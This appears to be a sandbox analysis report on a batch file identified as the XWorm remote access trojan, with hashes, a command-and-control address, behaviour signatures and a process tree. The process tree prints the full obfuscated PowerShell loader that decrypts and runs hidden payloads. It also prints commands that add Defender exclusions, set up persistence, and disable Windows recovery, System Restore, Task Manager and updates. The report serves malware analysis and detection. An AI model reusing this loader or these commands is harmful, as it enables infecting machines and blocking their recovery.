Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    298s
  • max time network
    300s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25/08/2024, 06:57

General

  • Target

    Uni.bat

  • Size

    359KB

  • MD5

    358406bc7ed5155f85a5ff1c578ee295

  • SHA1

    4e333529ae320ad77ebcc36fd9baa55796dc001d

  • SHA256

    da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf

  • SHA512

    0017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45

  • SSDEEP

    6144:ZbaZI71pQSxrJ9chRObtodtQlcxWHovdigPbYDDV:Zbac1ySxr/3bU3FzUh

Malware Config

Extracted

Family

xworm

Version

5.0

C2

las-protected.gl.at.ply.gg:59571

Mutex

bDBtf4nPCk2LZaWE

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Uni.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4852
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3076
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:3416
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3324
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_771_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_771.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1456
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_771.vbs"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4372
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_771.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:644
            • C:\Windows\system32\net.exe
              net file
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3460
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                6⤵
                  PID:1388
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Roaming\startup_str_771.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:696
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4128
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4256
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3272
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4564
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3408
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fhycjt.bat" "
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4488
                  • C:\Windows\system32\ReAgentc.exe
                    reagentc /disable
                    7⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:3488
                  • C:\Windows\system32\reg.exe
                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
                    7⤵
                      PID:5096
                    • C:\Windows\system32\reg.exe
                      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
                      7⤵
                        PID:1992
                      • C:\Windows\system32\reg.exe
                        REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
                        7⤵
                          PID:1532
                        • C:\Windows\system32\reg.exe
                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f
                          7⤵
                            PID:3188
                          • C:\Windows\system32\bcdedit.exe
                            bcdedit /set {default} bootstatuspolicy ignoreallfailures
                            7⤵
                            • Modifies boot configuration data using bcdedit
                            PID:4360
                          • C:\Windows\system32\reg.exe
                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
                            7⤵
                              PID:1520
                            • C:\Windows\system32\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f
                              7⤵
                                PID:2036
                              • C:\Windows\system32\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                7⤵
                                  PID:3408
                                • C:\Windows\system32\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                  7⤵
                                    PID:820
                                  • C:\Windows\system32\reg.exe
                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                    7⤵
                                      PID:3504
                                    • C:\Windows\system32\reg.exe
                                      REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f
                                      7⤵
                                        PID:4660
                                      • C:\Windows\system32\reg.exe
                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
                                        7⤵
                                        • Disables RegEdit via registry modification
                                        PID:936
                                      • C:\Windows\system32\reg.exe
                                        REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f
                                        7⤵
                                          PID:1948
                                        • C:\Windows\system32\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f
                                          7⤵
                                            PID:4776
                                          • C:\Windows\system32\reg.exe
                                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f
                                            7⤵
                                              PID:3544
                                            • C:\Windows\system32\reg.exe
                                              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f
                                              7⤵
                                                PID:4108
                                              • C:\Windows\system32\reg.exe
                                                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f
                                                7⤵
                                                  PID:760
                                                • C:\Windows\system32\reg.exe
                                                  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
                                                  7⤵
                                                    PID:3176
                                                  • C:\Windows\system32\reg.exe
                                                    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
                                                    7⤵
                                                      PID:3028
                                                    • C:\Windows\system32\reg.exe
                                                      REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
                                                      7⤵
                                                        PID:4880
                                                      • C:\Windows\system32\bcdedit.exe
                                                        bcdedit /set {default} recoveryenabled No
                                                        7⤵
                                                        • Modifies boot configuration data using bcdedit
                                                        PID:2544
                                                      • C:\Windows\system32\reg.exe
                                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f
                                                        7⤵
                                                          PID:5108
                                                        • C:\Windows\system32\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f
                                                          7⤵
                                                            PID:3372
                                                          • C:\Windows\system32\reg.exe
                                                            REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f
                                                            7⤵
                                                              PID:424
                                                            • C:\Windows\system32\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                              7⤵
                                                                PID:772
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable
                                                                7⤵
                                                                  PID:4940
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable
                                                                  7⤵
                                                                    PID:4968
                                                                  • C:\Windows\system32\reg.exe
                                                                    REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f
                                                                    7⤵
                                                                      PID:3600
                                                                    • C:\Windows\system32\reg.exe
                                                                      REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f
                                                                      7⤵
                                                                        PID:2836
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc config wercplsupport start=disabled
                                                                        7⤵
                                                                        • Launches sc.exe
                                                                        PID:4480
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc config WerSvc start=disabled
                                                                        7⤵
                                                                        • Launches sc.exe
                                                                        PID:1544
                                                          • C:\Users\Admin\Uni.exe
                                                            C:\Users\Admin\Uni.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:124

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            7c6fe7c423380b59d82d999572ed03d1

                                                            SHA1

                                                            4a07399f1714b5cfaea2f92a952d1f4473c216ae

                                                            SHA256

                                                            acc79cc65eaea62a945398adad81cb5615e1480fa659c904aa5cd450165c3d66

                                                            SHA512

                                                            6e617a604568bafa22773bd3dab3b681ccfd6869ded8e11802cbbdd9ea71d4998e2a1bfcdcf07c4ec473c3b028fe593448a33e7e9c904792221e89fb8359d665

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            6ed6547d270ec2a3219183bfa73bc09b

                                                            SHA1

                                                            efbcbdbdccab903a79b2b0a65d882eca8bb81363

                                                            SHA256

                                                            f7511aa08a289c57af48cfffb1361623c47df6324b80f94841ba69c9497f9ac2

                                                            SHA512

                                                            d396cd37f446f9798dcd60229f0c2f55a4bdc0541149dea4be51236e7d91bc65f2bf9eee8327beafc3fe387dded9c3cc049e2101137e73956194e88939a7ec72

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            944B

                                                            MD5

                                                            1a9fa92a4f2e2ec9e244d43a6a4f8fb9

                                                            SHA1

                                                            9910190edfaccece1dfcc1d92e357772f5dae8f7

                                                            SHA256

                                                            0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

                                                            SHA512

                                                            5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            944B

                                                            MD5

                                                            fb7bab8a7df1534bf72a828c80bedafd

                                                            SHA1

                                                            8a16ed89ab9be4bc268a216d766657c145c904db

                                                            SHA256

                                                            cba5f5393d4fb84307f346daf784565732dc6ff11924d90c12b94039b91b5f8f

                                                            SHA512

                                                            9dd3796c61e2edff0780687d47325377f89319ca76ed7de60a12787e8830b901bb3353705b88b06a3c1640af7d268bb428f14a06ffb5c26e7c7891b53f421a92

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            944B

                                                            MD5

                                                            f8c40f7624e23fa92ae2f41e34cfca77

                                                            SHA1

                                                            20e742cfe2759ac2adbc16db736a9e143ca7b677

                                                            SHA256

                                                            c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b

                                                            SHA512

                                                            f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2l4xkmo.vjt.ps1

                                                            Filesize

                                                            60B

                                                            MD5

                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                            SHA1

                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                            SHA256

                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                            SHA512

                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                          • C:\Users\Admin\AppData\Local\Temp\fhycjt.bat

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            ecde221cbc92ee55ae5b8c1a24e98f56

                                                            SHA1

                                                            ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee

                                                            SHA256

                                                            b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb

                                                            SHA512

                                                            122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493

                                                          • C:\Users\Admin\AppData\Roaming\startup_str_771.bat

                                                            Filesize

                                                            359KB

                                                            MD5

                                                            358406bc7ed5155f85a5ff1c578ee295

                                                            SHA1

                                                            4e333529ae320ad77ebcc36fd9baa55796dc001d

                                                            SHA256

                                                            da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf

                                                            SHA512

                                                            0017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45

                                                          • C:\Users\Admin\AppData\Roaming\startup_str_771.vbs

                                                            Filesize

                                                            115B

                                                            MD5

                                                            0e55927f429063811a190d04794df2f6

                                                            SHA1

                                                            bfaee1af4ef1ad68e72c193c70f3cdec52f7c5cc

                                                            SHA256

                                                            21427c7ad9eadc7121a87505073598ab7674a940626c9eff320a0a043733f513

                                                            SHA512

                                                            f54b744ce29fc485377542e84ed798288e3eac4c0b9c356cbd8795bf9019614fd10bbdb361b7248457890d50c463a84905b15627cc3db0cfa1ab6c2c33823f33

                                                          • C:\Users\Admin\Uni.exe

                                                            Filesize

                                                            440KB

                                                            MD5

                                                            0e9ccd796e251916133392539572a374

                                                            SHA1

                                                            eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

                                                            SHA256

                                                            c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

                                                            SHA512

                                                            e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

                                                          • memory/124-101-0x000001AEF90F0000-0x000001AEF9136000-memory.dmp

                                                            Filesize

                                                            280KB

                                                          • memory/696-47-0x0000015BF56E0000-0x0000015BF56F0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1456-24-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/1456-29-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/1456-26-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/1456-25-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3324-10-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3324-48-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3324-0-0x00007FFB015B3000-0x00007FFB015B5000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3324-9-0x0000023697B80000-0x0000023697BA2000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/3324-14-0x00000236AFE20000-0x00000236AFE54000-memory.dmp

                                                            Filesize

                                                            208KB

                                                          • memory/3324-13-0x00000236AFDF0000-0x00000236AFDF8000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/3324-12-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3324-11-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp

                                                            Filesize

                                                            10.8MB